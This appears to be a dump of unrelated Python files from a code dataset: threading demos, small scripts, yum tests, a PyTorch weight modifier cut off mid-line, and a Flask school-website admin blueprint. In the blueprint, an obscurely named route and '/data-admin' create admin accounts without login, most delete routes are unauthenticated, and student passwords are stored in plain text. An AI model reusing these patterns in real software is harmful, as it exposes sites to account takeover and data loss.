parser.add_argument('--lr_p', type=int, action='store', default=0,\n help='patience for learning rate decay')\n 
parser.add_argument('--clip', type=float, action='store', default=2.0,\n help='gradient clipping')\n parser.add_argument('--batch', type=int, action='store', default=32,\n help='the training batch size')\n parser.add_argument(\n '--ckpt_freq', type=int, action='store', default=3000,\n help='number of update steps for checkpoint and validation'\n )\n parser.add_argument('--patience', type=int, action='store', default=5,\n help='patience for early stopping')\n\n parser.add_argument('--debug', action='store_true',\n help='run in debugging mode')\n parser.add_argument('--no-cuda', action='store_true',\n help='disable GPU training')\n args = parser.parse_args()\n args.bi = not args.no_bi\n args.cuda = torch.cuda.is_available() and not args.no_cuda\n\n main(args)\n","sub_path":"train_uni.py","file_name":"train_uni.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"606662570","text":"from multiprocessing import Process,Lock\n\n\ndef f(l,i):\n l.acquire()\n print('hello,handsome',i)\n l.release()\n\ndef f2(i):\n print('hello,handsome2',i)\n\n\nif __name__ == '__main__':\n lock = Lock()\n for i in range(10):#加锁,防止一行为打印完,就开始打印下一行\n Process(target=f,args=(lock,i)).start()\n","sub_path":"线程和进程/进程/04进程同步/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"57024016","text":"'''在control_1LAMOST.csv中的每条数据声明,对应G表的id'''\n\nimport pandas as pd\n\ndef main():\n csv_file = pd.read_csv('control_1LAMOST.csv')\n csv_t = pd.read_csv('../galpair_AB3_LAMOST_Av_info_class_mass.csv')\n\n csv_file['galpair_index'] = 0\n csv_file['class_my'] = -2\n csv_t['galpair_index'] =0\n for i in csv_file.index:\n csv_file.loc[i,'galpair_index'] = i + 770000\n csv_t.loc[i,'galpair_index'] = i + 770000\n csv_file.loc[i,'class_my'] = csv_t.loc[i,'class_my']\n\n 
csv_file.to_csv('control_1_LAMOST.csv', index=False)\n csv_t.to_csv('galpair_AB3_LAMOST_Av_info_class_mass_new.csv', index=False)\n\n print(csv_file)\n # csv_file.to_csv('control_1_LAMOST.csv', index=False)\n\nif __name__ == '__main__':\n main()","sub_path":"jzq/control/seek_index_classs.py","file_name":"seek_index_classs.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"249349525","text":"#encoding: utf-8\n\nsrcpath = 'www_access_20140823.log'\ndstpath = 'zz.log'\n\nsrchandler = open(srcpath, 'r')\ndsthandler = open(dstpath, 'w')\nsize = 1024\n\nwhile True:\n cxt = srchandler.read(size)\n if not cxt:\n break\n dsthandler.write(cxt)\n\ndsthandler.close()\nsrchandler.close()","sub_path":"03/zhoufucheng/copyfile.py","file_name":"copyfile.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"533005035","text":"import threading\nimport time\n\"\"\"通过集成的方式去继承方式去实现进程\"\"\"\n\n\n\"\"\"重写进程函数\"\"\"\nclass Mythread(threading.Thread):\n def __init__(self,num):\n threading.Thread.__init__(self)\n self.num=num\n def run(self):\n print(\"runing on number:%s\",self.num)\n time.sleep(10)\n\n\n\n\nif __name__==\"__main__\":\n t1=Mythread(1)\n t2=Mythread(2)\n t1.start() # 执行start就是我们进程类中的run方法\n t2.start()\n","sub_path":"thread/创建进程.py","file_name":"创建进程.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"373983496","text":"\"\"\"\nCopyright (c) 2018 Red Hat, Inc\nAll rights reserved.\n\nThis software may be modified and distributed under the terms\nof the BSD license. See the LICENSE file for details.\n\nVery small subset of tests for the YumRepo class. 
Most testing\nis done in test_add_yum_repo_by_url\n\"\"\"\nfrom fnmatch import fnmatch\nimport sys\nfrom atomic_reactor.yum_util import YumRepo\nimport pytest\n\n\n@pytest.mark.parametrize(('repourl', 'add_hash', 'pattern'), (\n ('http://example.com/a/b/c/myrepo.repo', True, 'myrepo-?????.repo'),\n ('http://example.com/a/b/c/myrepo', True, 'myrepo-?????.repo'),\n ('http://example.com/repo-2.repo', True, 'repo-2-?????.repo'),\n ('http://example.com/repo-2', True, 'repo-2-?????.repo'),\n ('http://example.com/spam/myrepo.repo', True, 'myrepo-?????.repo'),\n ('http://example.com/bacon/myrepo', True, 'myrepo-?????.repo'),\n ('http://example.com/spam/myrepo-608de.repo', False, 'myrepo-?????.repo'),\n))\ndef test_add_repo_to_url(repourl, add_hash, pattern):\n repo = YumRepo(repourl, add_hash=add_hash)\n assert repo.repourl == repourl\n assert fnmatch(repo.filename, pattern)\n\n\ndef test_invalid_config():\n repo = YumRepo('http://example.com/a/b/c/myrepo.repo', 'line noise')\n if (sys.version_info < (3, 0)):\n assert not repo.is_valid()\n else:\n assert True\n","sub_path":"tests/test_yum_util.py","file_name":"test_yum_util.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"456590892","text":"\nfrom flask import Flask, Blueprint,flash, render_template, url_for, redirect, request\nfrom albina import db, bcrypt\nfrom albina import app\nfrom flask_wtf import file\nfrom wtforms import form\nfrom wtforms.validators import DataRequired\nfrom albina.dtbase import Dt_daftar,Dt_admin, Dt_profil,Dt_berita,Dt_program,Dt_kegiatan,Dt_galeri,Dt_sarana# Tabel bagian database\nfrom albina.admin.forms import updt_fadmin,dt_fberita, dt_fgaleri,dt_fkegiatan, dt_fprofil,dt_fprogram, login_fadmin,upt_berita,upt_profil,upt_kegiatan,upt_galeri,upt_program,upt_sarana, dt_fsarana, dt_fdaftar , dftr_fadmin # data dari forms\nfrom flask_login import login_user, current_user, logout_user, 
login_required\nfrom PIL import Image\nimport os\nimport secrets\n\nbadmin= Blueprint('badmin',__name__)\n\n#simpan foto\ndef simpan_gambar(form_gmbr):\n random_hex= secrets.token_hex(8)\n f_name, f_ext= os.path.splitext(form_gmbr.filename)\n foto_fn= random_hex + f_ext\n foto_path= os.path.join(app.root_path, 'albina/static/gambar', foto_fn)\n ubah_size=(300,300)\n j=Image.open(form_gmbr)\n j.thumbnail(ubah_size)\n j.save(foto_path)\n #form_foto.save(foto_path)\n return foto_fn\n\n#simpan surat\n\n\n@badmin.route(\"/dashboard\", methods=['GET','POST'])\ndef dasboard():\n return render_template(\"admin/dashboard.html\")\n\n@badmin.route(\"/jalan-tikus-jangan-lewat\", methods=['GET','POST'])\ndef akun():\n form=dftr_fadmin()\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n pass_hash=bcrypt.generate_password_hash(form.password.data).decode('UTF-8')\n dataadmin=Dt_admin(nip=form.nip.data, password=pass_hash, nama=form.nama.data, gmbr=file_gambar)\n db.session.add(dataadmin)\n db.session.commit()\n return redirect(url_for('badmin.dasboard'))\n return render_template(\"admin/akun.html\", form=form)\n\n \n@badmin.route(\"/data-admin\", methods=['GET','POST'])\ndef admin(): \n form=dftr_fadmin()\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n pass_hash=bcrypt.generate_password_hash(form.password.data).decode('UTF-8')\n dataadmin=Dt_admin(nip=form.nip.data, password=pass_hash, nama=form.nama.data, gmbr=file_gambar)\n db.session.add(dataadmin)\n db.session.commit()\n return redirect(url_for('badmin.dasboard'))\n return render_template(\"admin/admin.html\", form=form)\n\n\n@badmin.route(\"/login-admin\", methods=['GET','POST'])\ndef login_admin():\n if current_user.is_authenticated:\n return redirect(url_for('badmin.dasboard'))\n form=login_fadmin()\n if form.validate_on_submit():\n ceknip=Dt_admin.query.filter_by(nip=form.nip.data).first()\n if ceknip and bcrypt.check_password_hash(ceknip.password, 
form.password.data):\n login_user(ceknip)\n flash('Anda Berhasil Login!')\n return redirect(url_for('badmin.login_admin'))\n else:\n flash('login gagal')\n return render_template(\"admin/login.html\",form=form)\n\n\n@badmin.route(\"/update-admin\", methods=['GET', 'POST'])\ndef update_admin():\n form=updt_fadmin() \n if form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n current_user.foto = file_gambar\n pass_hash=bcrypt.generate_password_hash(form.password.data).decode('UTF-8')\n current_user.nip=form.nip.data\n current_user.nama=form.nama.data\n current_user.password=pass_hash\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.dasboard'))\n elif request.method==\"GET\":\n form.nip.data= current_user.nip\n form.nama.data=current_user.nama\n form.password.data=current_user.password\n return render_template('admin/uptadmin.html', form=form)\n\n@badmin.route(\"/akun-admin\")\n@login_required\ndef akunadmin():\n return render_template(\"admin/akunadmin.html\")\n\n\n############ profile sekolah #############\n\n@badmin.route(\"/profil-sekolah\", methods=['GET','POST'])\ndef profil():\n form=dt_fprofil()\n dataprofil=Dt_profil.query.all()\n if form.validate_on_submit():\n add= Dt_profil(profil=form.profil.data, visi=form.visi.data, misi=form.misi.data)\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.profil'))\n return render_template (\"admin/profil.html\", dataprofil=dataprofil, form=form)\n\n\n@badmin.route(\"/update-profil//update\", methods=['GET', 'POST'])\ndef update_profil(ed_id):\n dataprofil=Dt_profil.query.get_or_404(ed_id)\n form=upt_profil()\n if form.validate_on_submit():\n dataprofil.profil=form.profil.data\n dataprofil.visi=form.visi.data\n dataprofil.misi=form.misi.data\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.profil'))\n elif 
request.method==\"GET\":\n form.profil.data=dataprofil.profil\n form.visi.data=dataprofil.visi\n form.misi.data=dataprofil.misi\n return render_template('admin/uptprofil.html', form=form)\n\n@badmin.route(\"/hapus-profil/\", methods=['GET', 'POST'])\ndef hapus_profil(id):\n qprofil=Dt_profil.query.get(id)\n db.session.delete(qprofil)\n db.session.commit()\n return redirect(url_for('badmin.berita'))\n###############################################\n\n###### program sekolah #################\n\n@badmin.route(\"/program-sekolah\", methods=['GET','POST'], defaults={\"page\": 1})\n@badmin.route(\"/program-sekolah/\", methods=['GET', 'POST'])\n\ndef program(page):\n page=page\n pages=2\n form=dt_fprogram()\n dataprogram=Dt_program.query.all()\n dataprogram = Dt_program.query.order_by(Dt_program.id.asc()).paginate(page, pages, error_out=False)\n if request.method == 'POST' and 'tag' in request.form:\n tag = request.form[\"tag\"]\n search = \"%{}%\".format(tag)\n dataprogram = Dt_program.query.filter(Dt_program.program.like(search)).paginate(page, pages, error_out=False)\n return render_template(\"admin/program.html\", dataprogram=dataprogram, form=form, tag=tag)\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n add= Dt_program(program=form.program.data,ket=form.ket.data, gmbr=file_gambar)\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.program'))\n return render_template (\"admin/program.html\", dataprogram=dataprogram, form=form)\n\n@badmin.route(\"/update-program//update\", methods=['GET', 'POST'])\ndef update_program(ed_id):\n dataprogram=Dt_program.query.get_or_404(ed_id)\n form=upt_program()\n if form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n form.foto = file_gambar\n dataprogram.program=form.program.data\n dataprogram.gmbr=file_gambar\n dataprogram.ket=form.ket.data\n db.session.commit()\n return 
redirect(url_for('badmin.program'))\n elif request.method==\"GET\":\n form.program.data=dataprogram.program\n form.ket.data=dataprogram.ket\n return render_template('admin/uptprogram.html', form=form)\n\n@badmin.route(\"/hapus-program/\", methods=['GET', 'POST'])\ndef hapus_program(id):\n qprogram=Dt_program.query.get(id)\n db.session.delete(qprogram)\n db.session.commit()\n return redirect(url_for('badmin.program')) \n############################################\n\n############## kegiatan siswa ####################\n\n@badmin.route(\"/kegiatan-sekolah\", methods=['GET','POST'], defaults={\"page\": 1})\n@badmin.route(\"/kegiatan-sekolah/\", methods=['GET', 'POST'])\ndef kegiatan(page):\n page=page\n pages=2\n form=dt_fkegiatan()\n datakegiatan=Dt_kegiatan.query.all()\n datakegiatan = Dt_kegiatan.query.order_by(Dt_kegiatan.id.asc ()).paginate(page, pages, error_out=False)\n if request.method == 'POST' and 'tag' in request.form:\n tag = request.form[\"tag\"]\n search = \"%{}%\".format(tag)\n datakegiatan = Dt_kegiatan.query.filter(Dt_kegiatan.kegiatan.like(search)).paginate(page, pages, error_out=False)\n return render_template(\"admin/kegiatan.html\", datakegiatan=datakegiatan, form=form, tag=tag)\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n add= Dt_kegiatan(kegiatan=form.kegiatan.data,ket=form.ket.data, gmbr=file_gambar)\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.kegiatan'))\n return render_template (\"admin/kegiatan.html\", datakegiatan=datakegiatan, form=form)\n\n\n@badmin.route(\"/update-kegiatan//update\", methods=['GET', 'POST'])\ndef update_kegiatan(ed_id):\n datakegiatan=Dt_kegiatan.query.get_or_404(ed_id)\n form=upt_kegiatan()\n if form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n form.foto = file_gambar\n datakegiatan.kegiatan=form.kegiatan.data\n datakegiatan.gmbr=file_gambar\n 
datakegiatan.ket=form.ket.data\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.kegiatan'))\n elif request.method==\"GET\":\n form.kegiatan.data=datakegiatan.kegiatan\n form.ket.data=datakegiatan.ket\n return render_template('admin/uptkegiatan.html', form=form)\n\n@badmin.route(\"/hapus-kegiatan/\", methods=['GET', 'POST'])\ndef hapus_kegiatan(id):\n qkegiatan=Dt_kegiatan.query.get(id)\n db.session.delete(qkegiatan)\n db.session.commit()\n return redirect(url_for('badmin.profil'))\n##############################################\n\n############# Sarana Prasarana ############\n\n@badmin.route(\"/sarana-sekolah\", methods=['GET','POST'], defaults={\"page\": 1})\n@badmin.route(\"/sarana-sekolah/\", methods=['GET', 'POST'])\n@login_required\ndef sarana(page):\n page=page\n pages=2\n form=dt_fsarana()\n datasarana=Dt_sarana.query.all()\n datasarana = Dt_sarana.query.order_by(Dt_sarana.id.asc ()).paginate(page, pages, error_out=False)\n if request.method == 'POST' and 'tag' in request.form:\n tag = request.form[\"tag\"]\n search = \"%{}%\".format(tag)\n datasarana = Dt_sarana.query.filter(Dt_sarana.sarana.like(search)).paginate(page, pages, error_out=False)\n return render_template(\"admin/sarana.html\", datasarana=datasarana, form=form, tag=tag)\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n add= Dt_sarana(sarana=form.sarana.data,ket=form.ket.data, gmbr=file_gambar)\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.sarana'))\n return render_template (\"admin/sarana.html\", datasarana=datasarana, form=form)\n \n@badmin.route(\"/update-sarana//update\", methods=['GET', 'POST'])\ndef update_sarana(ed_id):\n datasarana=Dt_sarana.query.get_or_404(ed_id)\n form=upt_sarana()\n if form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n form.foto = file_gambar\n 
datasarana.sarana=form.sarana.data\n datasarana.ket=form.ket.data\n datasarana.gmbr=file_gambar\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.sarana'))\n elif request.method==\"GET\":\n form.sarana.data=datasarana.sarana\n form.ket.data=datasarana.ket\n return render_template('admin/uptsarana.html', form=form)\n\n@badmin.route(\"/hapus-sarana/\", methods=['GET', 'POST'])\ndef hapus_sarana(id):\n qsarana=Dt_sarana.query.get(id)\n db.session.delete(qsarana)\n db.session.commit()\n return redirect(url_for('badmin.sarana'))\n\n\n########### Berita ##############\n@badmin.route(\"/berita-sekolah\", methods=['GET','POST'], defaults={\"page\": 1})\n@badmin.route(\"/berita-sekolah/\", methods=['GET', 'POST'])\n@login_required\ndef berita(page):\n page=page\n pages=2\n form=dt_fberita()\n databerita=Dt_berita.query.all()\n databerita = Dt_berita.query.order_by(Dt_berita.id.asc ()).paginate(page, pages, error_out=False)\n if request.method == 'POST' and 'tag' in request.form:\n tag = request.form[\"tag\"]\n search = \"%{}%\".format(tag)\n databerita = Dt_berita.query.filter(Dt_berita.berita.like(search)).paginate(page, pages, error_out=False)\n return render_template(\"admin/berita.html\", databerita=databerita, form=form, tag=tag)\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n add= Dt_berita(berita=form.berita.data,ket=form.ket.data, gmbr=file_gambar)\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.berita'))\n return render_template (\"admin/berita.html\", databerita=databerita, form=form)\n\n@badmin.route(\"/profil-admin\")\ndef profiladmin():\n dataadmin=Dt_admin.query.all()\n return render_template (\"admin/dtladmin.html\", dataadmin=dataadmin)\n\n@badmin.route(\"/update-berita//update\", methods=['GET', 'POST'])\ndef update_berita(ed_id):\n databerita=Dt_berita.query.get_or_404(ed_id)\n form=upt_berita()\n if 
form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n form.foto = file_gambar\n databerita.berita=form.berita.data\n databerita.ket=form.ket.data\n databerita.gmbr=file_gambar\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.berita'))\n elif request.method==\"GET\":\n form.berita.data=databerita.berita\n form.ket.data=databerita.ket\n return render_template('admin/uptberita.html', form=form)\n\n@badmin.route(\"/hapus-berita/\", methods=['GET', 'POST'])\ndef hapus_berita(id):\n qberita=Dt_berita.query.get(id)\n db.session.delete(qberita)\n db.session.commit()\n return redirect(url_for('badmin.berita'))\n\n\n\n\n######### Galeri ###########\n@badmin.route(\"/galeri-sekolah\", methods=['GET','POST'], defaults={\"page\": 1})\n@badmin.route(\"/galeri-sekolah/\", methods=['GET', 'POST'])\ndef galeri(page):\n page=page\n pages=2\n form=dt_fgaleri()\n datagaleri=Dt_galeri.query.all()\n datagaleri = Dt_galeri.query.order_by(Dt_galeri.id.asc ()).paginate(page, pages, error_out=False)\n if request.method == 'POST' and 'tag' in request.form:\n tag = request.form[\"tag\"]\n search = \"%{}%\".format(tag)\n datagaleri = Dt_galeri.query.filter(Dt_galeri.ket.like(search)).paginate(page, pages, error_out=False)\n return render_template(\"admin/galeri.html\", datagaleri=datagaleri, form=form, tag=tag)\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n add= Dt_galeri(ket=form.ket.data, gmbr=file_gambar)\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.galeri'))\n return render_template (\"admin/galeri.html\", datagaleri=datagaleri, form=form)\n\n\n@badmin.route(\"/update-galeri//update\", methods=['GET', 'POST'])\ndef update_galeri(ed_id):\n datagaleri=Dt_galeri.query.get_or_404(ed_id)\n form=upt_galeri()\n if form.validate_on_submit():\n if form.gmbr.data:\n 
file_gambar=simpan_gambar(form.gmbr.data)\n form.foto = file_gambar\n datagaleri.gmbr=file_gambar\n datagaleri.ket=form.ket.data\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.galeri'))\n elif request.method==\"GET\":\n form.ket.data=datagaleri.ket\n return render_template('admin/uptgaleri.html', form=form)\n\n@badmin.route(\"/hapus-galeri/\", methods=['GET', 'POST'])\ndef hapus_galeri(id):\n qgaleri=Dt_galeri.query.get(id)\n db.session.delete(qgaleri)\n db.session.commit()\n return redirect(url_for('badmin.galeri'))\n\n\n####################\n\n\n\n##### pendaftaran siswa lewat admin ##########\n@badmin.route(\"/data/siswa-baru\", methods=['GET','POST'], defaults={\"hal\": 1})\n@badmin.route(\"/\", methods=['GET', 'POST'])\ndef siswa1(hal):\n hal=hal\n hals=10\n form=dt_fdaftar()\n datasiswa=Dt_daftar.query.all()\n datasiswa = Dt_daftar.query.order_by(Dt_daftar.id.asc ()).paginate(hal, hals, error_out=False)\n if request.method == 'POST' and 'tag' in request.form:\n tag = request.form[\"tag\"]\n search = \"%{}%\".format(tag)\n datasiswa = Dt_daftar.query.filter(Dt_daftar.tag.like(search)).paginate(hal, hals, error_out=False)\n return render_template(\"admin/siswabaru.html\", datasiswa=datasiswa, tag=tag)\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n add= Dt_daftar(niss=form.niss.data, nm_siswa=form.nm_siswa.data, tmpt_lhr =form.tmpt_lhr.data, tgl_lhr=form.tgl_lhr.data, jk=form.jk.data, almt_siswa=form.almt_siswa.data, agama=form.agama.data, nm_ortu=form.nm_ortu.data, telp_ortu=form.telp_ortu.data,password=form.password.data, gmbr=file_gambar )\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.siswa1'))\n return render_template (\"admin/siswabaru.html\", datasiswa=datasiswa, form=form)\n\n#@badmin.route(\"/update-siswa//update\", methods=['GET', 'POST'])\n#def update_siswa(ed_id):\n 
datasiswa=Dt_daftar.query.get_or_404(ed_id)\n form=upt_siswa()\n if form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n form.foto = file_gambar\n pass_hash=bcrypt.generate_password_hash(form.password.data).decode('UTF-8')\n datasiswa.niss=form.niss\n datasiswa.nm_siswa=form.nm_siswa\n datasiswa.tmpt_lhr =form.tmpt_lhr \n datasiswa.tgl_lhr=form.tgl_lhr\n datasiswa.almt_siswa=form.almt_siswa\n datasiswa.agama=form.agama\n datasiswa.nm_ortu=form.nm_ortu\n datasiswa.telp_ortu=form.telp_ortu\n datasiswa.password=pass_hash\n datasiswa.gmbr=file_gambar\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.siswa'))\n #elif request.method==\"GET\":\n form.niss=datasiswa.niss\n form.nm_siswa=datasiswa.nm_siswa\n form.tmpt_lhr=datasiswa.tmpt_lhr \n form.tgl_lhr=datasiswa.tgl_lhr\n form.jk=datasiswa.jk\n form.almt_siswa=datasiswa.almt_siswa\n form.agama=datasiswa.agama\n form.nm_ortu=datasiswa.nm_ortu\n form.telp_ortu=datasiswa.telp_ortu\n form.password.data=current_user.password\n #return render_template('admin/uptsiswa.html', form=form)\n\n\n@badmin.route(\"/hapus-siswa/\", methods=['GET', 'POST'])\ndef hapus_siswa(id):\n qsiswa=Dt_daftar.query.get(id)\n db.session.delete(qsiswa)\n db.session.commit()\n return redirect(url_for('badmin.siswa')) \n\n@badmin.route(\"/logout-admin\")\ndef logoutadmin(): \n logout_user()\n return redirect(url_for('badmin.login_admin'))\n\n\n \n\n\n\n\n\n","sub_path":"albina/admin/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":19335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"594964147","text":"class Node:\n def __init__(self,data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\ndef traversal(head):\n p = head\n data = []\n data.append(p.data)\n while p is not None:\n print(p.data)\n if p.next.data not in data:\n 
data.append(p.next.data)\n else:\n p.next = None\n break\n\n p = p.next\n print(data)\n\nif __name__=='__main__':\n linklist = LinkedList()\n\n linklist.head = Node(1)\n two = Node(2)\n three = Node(3)\n four = Node(4)\n five = Node(5)\n\n linklist.head.next = two\n two.next = three\n three.next = four\n four.next = five\n five.next = two\n\n traversal(linklist.head)","sub_path":"LinkedList/DetectAndRemoLoop.py","file_name":"DetectAndRemoLoop.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"19676915","text":"#fibonacci number\r\n# 1, 1, 2, 3, 5, 8...\r\n#fn = fn - 1 + fn - 2\r\n#where F0 = 0 F1 = 1\r\n#print(fib(3))\r\n#list : result = fib(2) + fib(1)\r\n# 1st : result = fib(2) + fib(1) : 2 + 1 = 3\r\n# 2nd : result = (fib(1)) + (fib(0)) + (fib(0)) : 1 + 0 = 1\r\ndef fib(n):\r\n if n == 0:\r\n return 0\r\n elif n == 1:\r\n return 1\r\n else:\r\n result = fib(n - 1) + fib(n -2)\r\n return result\r\n#as how many nos. 
they want\r\nnumFibValues = int(input(\"how much values should be found\"))\r\n#loop while calling for each number\r\ni = 1\r\nwhile i < numFibValues:\r\n fibValue = fib(i)\r\n print(fibValue)\r\n i += 1\r\nprint(\"all done\")\r\n","sub_path":"fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"217509174","text":"import torch \nimport torch.nn as nn\nfrom collections import OrderedDict\nimport torch.nn.functional as F\nimport numpy as np\nimport logging\nimport importlib\nimport sys\nfrom torch_relay_build import torch_relay_func\nfrom torch_func_modifier import func_modifier\nformatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n\n'''Calculate Latency Overhead from csv file'''\ndef csv_to_time_overhead(csv_file):\n df = pd.read_csv(csv_file, skiprows=2)\n # df = df.drop_duplicates(subset=['ID'])\n # print(df)\n trace_df = df[df['Metric Name'] == \"Cycles\"]\n trace_df= trace_df.replace(',','', regex=True)\n trace_df['Metric Value'] = pd.to_numeric(trace_df['Metric Value'])\n cost = trace_df['Metric Value'].sum()\n return cost\n\n'''Decode a sequence prediction'''\ndef reverse_map(label_file, layer_int_to_name_map):\n label_array = np.load(label_file)\n\n str_decoded = ''\n for x in label_array:\n if x in layer_int_to_name_map:\n str_decoded = str_decoded + layer_int_to_name_map[x] + ' '\n else:\n print(\"x=%d MAJOR ERROR? 
OUT OF PREDICTION SCOPE\" % x)\n return str_decoded\n\n'''Modify the saved model parameters, this is necessary for a trained model in practice'''\ndef modify_state_dict(model_file, state_dict, modify_list, widen_list, decompo_list, deepen_list, skipcon_list, kerneladd_list):\n j = -1\n # print(\"modify the state_dict to apply decomposition\")\n with open(\"./model_file/\" + model_file, \"r\") as in_file:\n buf = in_file.readlines()\n for i in range(len(modify_list)):\n if \"conv\" in modify_list[i]: # assume all conv layer use \"conv + digit\" as layer name. such as conv1, conv8\n j += 1\n conv_name = \"conv\" + modify_list[i].split(\"v\")[1]\n if_bias = next((False for line in buf if (\"self.{} = \".format(conv_name) in line and \"False\" in line and \"torch.nn.\" in line)), True)\n '''Modify kerneladd_list (conv)'''\n if kerneladd_list[j] > 0: #kernel_size\n orig_weight = state_dict[\"{}.weight\".format(conv_name)]\n state_dict['{}.weight'.format(conv_name)] = F.pad(input=orig_weight, pad=(kerneladd_list[j], kerneladd_list[j], kerneladd_list[j], kerneladd_list[j], 0, 0, 0, 0), mode='constant', value=0.0)\n '''Modify widen_list (conv)'''\n if (widen_list[j] > 1) and (j < len(kerneladd_list) - 1): #layer_widening, do not do to the last conv layer\n orig_weight = state_dict[\"{}.weight\".format(conv_name)]\n orig_shape = orig_weight.size()\n if if_bias:\n orig_bias = state_dict[\"{}.bias\".format(conv_name)]\n bn_name = \"conv_bn\" + modify_list[i].split(\"v\")[1]\n next_conv_name = \"conv\" + str(int(modify_list[i].split(\"v\")[1]) + 1)\n orig_next_weight = state_dict['{}.weight'.format(next_conv_name)]\n\n extra_c = int(np.floor(orig_shape[0] *(widen_list[j] - np.floor(widen_list[j]))/4)*4) # get float part\n mul_factor = int(np.floor(widen_list[j])) # get int\n state_dict['{}.weight'.format(conv_name)] = torch.cat([orig_weight[:extra_c, :, :, :].repeat_interleave(mul_factor+1,0), orig_weight[extra_c:, :, :, :].repeat_interleave(mul_factor,0)], 0)\n if if_bias:\n 
state_dict['{}.bias'.format(conv_name)] = torch.cat([orig_bias[:extra_c].repeat_interleave(mul_factor+1,0), orig_bias[extra_c:].repeat_interleave(mul_factor,0)], 0)\n result = next((True for line in buf if bn_name in line), False)\n if result:\n orig_bn_weight = state_dict['{}.weight'.format(bn_name)]\n orig_bn_bias = state_dict['{}.bias'.format(bn_name)]\n orig_bn_running_mean = state_dict['{}.running_mean'.format(bn_name)]\n orig_bn_running_var = state_dict['{}.running_var'.format(bn_name)]\n state_dict['{}.weight'.format(bn_name)] = torch.cat([orig_bn_weight[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_weight[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.bias'.format(bn_name)] = torch.cat([orig_bn_bias[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_bias[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.running_mean'.format(bn_name)] = torch.cat([orig_bn_running_mean[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_running_mean[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.running_var'.format(bn_name)] = torch.cat([orig_bn_running_var[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_running_var[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.weight'.format(next_conv_name)] = torch.cat([orig_next_weight[:, :extra_c, :, :].repeat_interleave(mul_factor+1,1)/(mul_factor+1), orig_next_weight[:, extra_c:, :, :].repeat_interleave(mul_factor,1)/mul_factor], 1)\n\n '''Modify deepen_list (conv)'''\n if deepen_list[j] == 1: #layer_deepening\n state_dict['{}_dp.weight'.format(conv_name)] = torch.eye(state_dict['{}.weight'.format(conv_name)].size()[0]).unsqueeze(2).unsqueeze(3)\n if if_bias:\n state_dict['{}_dp.bias'.format(conv_name)] = 